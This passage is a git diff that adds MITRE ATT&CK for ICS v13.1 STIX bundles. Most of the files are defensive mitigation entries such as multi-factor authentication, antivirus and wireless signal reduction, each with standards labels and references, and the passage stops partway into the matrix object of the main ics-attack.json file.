+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--a010090d-3f16-4f7e-814c-da8599564967",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:14.263Z",
+ "name": "Communication Authenticity",
+ "description": "When communicating over an untrusted network, utilize secure network protocols that both authenticate the message sender and can verify its integrity. This can be done either through message authentication codes (MACs) or digital signatures, to detect spoofed network messages and unauthorized connections.",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 3.1",
+ "IEC 62443-4-2:2019 - CR 3.1",
+ "NIST SP 800-53 Rev. 4 - SC-8; SC-23"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac",
+ "created": "2020-09-11T16:32:21.854Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0802",
+ "external_id": "M0802"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d0909119-2f71-4923-87db-b649881672d7.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d0909119-2f71-4923-87db-b649881672d7.json
new file mode 100644
index 0000000000000000000000000000000000000000..a21cf86485efa26eeadc04bb389bfa12fbd4e5e6
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d0909119-2f71-4923-87db-b649881672d7.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--2a395ddb-6316-4269-8e7b-86a989bb06ea",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:20.110Z",
+ "name": "Disable or Remove Feature or Program",
+ "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 7.7",
+ "IEC 62443-4-2:2019 - CR 7.7",
+ "NIST SP 800-53 Rev. 4 - CM-7"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--d0909119-2f71-4923-87db-b649881672d7",
+ "created": "2019-06-11T16:45:19.740Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0942",
+ "external_id": "M0942"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d48b79b2-076d-483e-949c-0d38aa347499.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d48b79b2-076d-483e-949c-0d38aa347499.json
new file mode 100644
index 0000000000000000000000000000000000000000..9c9b3d86944414acb9b04d453c641c62c8b30b50
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d48b79b2-076d-483e-949c-0d38aa347499.json
@@ -0,0 +1,32 @@
+{
+ "type": "bundle",
+ "id": "bundle--de2cca52-6639-4689-9924-c1174355051d",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-24T15:09:07.609Z",
+ "name": "Threat Intelligence Program",
+ "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499",
+ "created": "2019-06-06T19:55:50.927Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0919",
+ "external_id": "M0919"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--da44255d-85c5-492c-baf3-ee823d44f848.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--da44255d-85c5-492c-baf3-ee823d44f848.json
new file mode 100644
index 0000000000000000000000000000000000000000..640f9f2a01851d781bfe456bdde093b9290c8b47
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--da44255d-85c5-492c-baf3-ee823d44f848.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--83d6b557-b464-41b1-b601-015f93865f8e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-24T15:09:07.609Z",
+ "name": "Safety Instrumented Systems",
+ "description": "Utilize Safety Instrumented Systems (SIS) to provide an additional layer of protection to hazard scenarios that may cause property damage. A SIS will typically include sensors, logic solvers, and a final control element that can be used to automatically respond to an hazardous condition (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) . Ensure that all SISs are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848",
+ "created": "2019-06-06T21:16:18.709Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0812",
+ "external_id": "M0812"
+ },
+ {
+ "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004",
+ "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ",
+ "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba.json
new file mode 100644
index 0000000000000000000000000000000000000000..86d7d845e565af9bb700f8351dd2509cb87cc6e7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba.json
@@ -0,0 +1,35 @@
+{
+ "type": "bundle",
+ "id": "bundle--19b957d9-c2df-4708-8b0e-fd08381f3d1e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:17.076Z",
+ "name": "User Training",
+ "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+ "labels": [
+ "NIST SP 800-53 Rev. 4 - AT-2"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba",
+ "created": "2019-06-06T16:50:04.963Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0917",
+ "external_id": "M0917"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd.json
new file mode 100644
index 0000000000000000000000000000000000000000..bc9d36620026cc3efe5a91ea63f7c530573c1913
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--4ee2a656-2cb5-4763-8ef6-ebe69fa79e4d",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:18.842Z",
+ "name": "Multi-factor Authentication",
+ "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. Within industrial control environments assets such as low-level controllers, workstations, and HMIs have real-time operational control and safety requirements which may restrict the use of multi-factor.",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 1.7",
+ "IEC 62443-4-2:2019 - CR 1.7",
+ "NIST SP 800-53 Rev. 4 - IA-2"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd",
+ "created": "2019-06-10T20:53:36.319Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0932",
+ "external_id": "M0932"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037.json
new file mode 100644
index 0000000000000000000000000000000000000000..8b58407ec761cea1b244c1db8aa9136ae52d637e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037.json
@@ -0,0 +1,35 @@
+{
+ "type": "bundle",
+ "id": "bundle--ee2a4de7-7066-4ffc-bd59-86ddce8acd2c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:16.897Z",
+ "name": "Vulnerability Scanning",
+ "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
+ "labels": [
+ "NIST SP 800-53 Rev. 4 - RA-5"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037",
+ "created": "2019-06-06T16:47:30.700Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0916",
+ "external_id": "M0916"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd.json
new file mode 100644
index 0000000000000000000000000000000000000000..0dce9d0b042eb41e92aa6e097f087d4256afefa5
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd.json
@@ -0,0 +1,47 @@
+{
+ "type": "bundle",
+ "id": "bundle--48ba8f57-622d-4d71-80c8-8fd3f8e7707a",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:13.851Z",
+ "name": "Authorization Enforcement",
+ "description": "The device or system should restrict read, manipulate, or execute privileges to only authenticated users who require access based on approved security policies. Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector (Citation: International Electrotechnical Commission July 2020), while IEEE 1686 defines standard permissions for users of IEDs. (Citation: Institute of Electrical and Electronics Engineers January 2014)",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 2.1",
+ "IEC 62443-4-2:2019 - CR 2.1",
+ "NIST SP 800-53 Rev. 4 - AC-3"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd",
+ "created": "2020-09-11T16:32:21.854Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0800",
+ "external_id": "M0800"
+ },
+ {
+ "source_name": "International Electrotechnical Commission July 2020",
+ "description": "International Electrotechnical Commission 2020, July 17 IEC 62351 - Power systems management and associated information exchange - Data and communications security Retrieved. 2020/09/17 ",
+ "url": "https://webstore.iec.ch/publication/6912"
+ },
+ {
+ "source_name": "Institute of Electrical and Electronics Engineers January 2014",
+ "description": "Institute of Electrical and Electronics Engineers 2014, January 1686-2013 - IEEE Standard for Intelligent Electronic Devices Cyber Security Capabilities Retrieved. 2020/09/17 ",
+ "url": "https://standards.ieee.org/standard/1686-2013.html"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48.json
new file mode 100644
index 0000000000000000000000000000000000000000..e05cd0ba7c693609c1b3cc53f135633c9667eca7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--8e73ddb0-1317-4f97-8823-698dd3d2460e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:17.252Z",
+ "name": "User Account Management",
+ "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 1.3",
+ "IEC 62443-4-2:2019 - CR 1.3",
+ "NIST SP 800-53 Rev. 4 - AC-2"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48",
+ "created": "2019-06-06T16:50:58.767Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0918",
+ "external_id": "M0918"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd.json
new file mode 100644
index 0000000000000000000000000000000000000000..c2f9c0a7c41368ed01c919ad2302b8ae45540c8e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd.json
@@ -0,0 +1,35 @@
+{
+ "type": "bundle",
+ "id": "bundle--4581dc04-f963-4f04-9364-a3003f174db9",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:15.773Z",
+ "name": "Redundancy of Service",
+ "description": "Redundancy could be provided for both critical ICS devices and services, such as back-up devices or hot-standbys.",
+ "labels": [
+ "NIST SP 800-53 Rev. 4 - CP-9"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd",
+ "created": "2019-06-06T21:16:18.709Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0811",
+ "external_id": "M0811"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971.json
new file mode 100644
index 0000000000000000000000000000000000000000..53f8eba03b893a4579672e0385c5c5e301356fdb
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--9b89d1cd-d9f8-4169-a5b2-c684d5a433ba",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:17.592Z",
+ "name": "Restrict File and Directory Permissions",
+ "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 2.1",
+ "IEC 62443-4-2:2019 - CR 2.1",
+ "NIST SP 800-53 Rev. 4 - AC-6"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971",
+ "created": "2019-06-06T20:54:49.964Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0922",
+ "external_id": "M0922"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21.json
new file mode 100644
index 0000000000000000000000000000000000000000..6caff733441dada47aabfafffee57b0bcfa08236
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--5d32b2c5-c88e-410e-99fe-a19cd2fa461a",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:21.915Z",
+ "name": "Software Configuration",
+ "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated with how the software operates.",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 7.7",
+ "IEC 62443-4-2:2019 - CR 7.7",
+ "NIST SP 800-53 Rev. 4 - CM-7"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21",
+ "created": "2019-07-19T14:40:23.529Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0954",
+ "external_id": "M0954"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7.json
new file mode 100644
index 0000000000000000000000000000000000000000..7210742253ca94d132eaa232286815f1ca89e484
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7.json
@@ -0,0 +1,42 @@
+{
+ "type": "bundle",
+ "id": "bundle--ccddb982-78c0-417c-9cde-756e510379b4",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:21.180Z",
+ "name": "Antivirus/Antimalware",
+ "description": "Use signatures or heuristics to detect malicious software. Within industrial control environments, antivirus/antimalware installations should be limited to assets that are not involved in critical or real-time operations. To minimize the impact to system availability, all products should first be validated within a representative test environment before deployment to production systems. (Citation: NCCIC August 2018)",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 3.2",
+ "IEC 62443-4-2:2019 - CR 3.2",
+ "NIST SP 800-53 Rev. 4 - SI-3"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7",
+ "created": "2019-06-11T17:08:33.055Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0949",
+ "external_id": "M0949"
+ },
+ {
+ "source_name": "NCCIC August 2018",
+ "description": "NCCIC 2018, August 2 Recommended Practice: Updating Antivirus in an Industrial Control System Retrieved. 2020/09/17 ",
+ "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/Recommended%20Practice%20Updating%20Antivirus%20in%20an%20Industrial%20Control%20System_S508C.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e.json
new file mode 100644
index 0000000000000000000000000000000000000000..4dd376c3849dde9860113a661f93f04b95832b37
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e.json
@@ -0,0 +1,47 @@
+{
+ "type": "bundle",
+ "id": "bundle--1d8249d6-39b2-4406-85c2-44dfc68734f1",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-30T20:55:14.800Z",
+ "name": "Minimize Wireless Signal Propagation",
+ "description": "Wireless signals frequently propagate outside of organizational boundaries, which provide opportunities for adversaries to monitor or gain unauthorized access to the wireless network. (Citation: CISA March 2010) To minimize this threat, organizations should implement measures to detect, understand, and reduce unnecessary RF propagation. (Citation: DHS National Urban Security Technology Laboratory April 2019)",
+ "labels": [
+ "IEC 62443-3-3:2013 - SR 1.6",
+ "IEC 62443-4-2:2019 - CR 1.6",
+ "NIST SP 800-53 Rev. 4 - SC-40"
+ ],
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_domains": [
+ "ics-attack"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "course-of-action",
+ "id": "course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e",
+ "created": "2020-09-11T16:32:21.854Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/M0806",
+ "external_id": "M0806"
+ },
+ {
+ "source_name": "CISA March 2010",
+ "description": "CISA 2010, March Securing Wireless Networks Retrieved. 2020/09/17 ",
+ "url": "https://us-cert.cisa.gov/ncas/tips/ST05-003"
+ },
+ {
+ "source_name": "DHS National Urban Security Technology Laboratory April 2019",
+ "description": "DHS National Urban Security Technology Laboratory 2019, April Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment Retrieved. 2020/09/17 ",
+ "url": "https://www.dhs.gov/sites/default/files/saver-msr-rf-detection_cod-508_10july2019.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/ics-attack/ics-attack.json b/cti-ATT-CK-v13.1/ics-attack/ics-attack.json
new file mode 100644
index 0000000000000000000000000000000000000000..828e5324d980030ad8967b66463adb89dc56c35f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/ics-attack/ics-attack.json
@@ -0,0 +1,28454 @@ +{ + "type": "bundle", + "id": "bundle--0f187f2a-a62a-4d35-95db-158a5c0d3ec3", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a", + "x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45", + "x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac", + "x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046", + "x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7", + "x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453", + "x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924", + "x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9", + "x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f", + "x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134", + "x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024", + "x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created": "2018-10-17T00:14:20.652Z", + "description": "The full ATT&CK for ICS Matrix includes techniques spanning various ICS assets and can be used to navigate through the knowledge base.", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "ics-attack", + "url": "https://attack.mitre.org/matrices/ics/" + } + ], + "id": "x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7", + "modified": "2022-05-06T17:47:24.396Z", + "name": 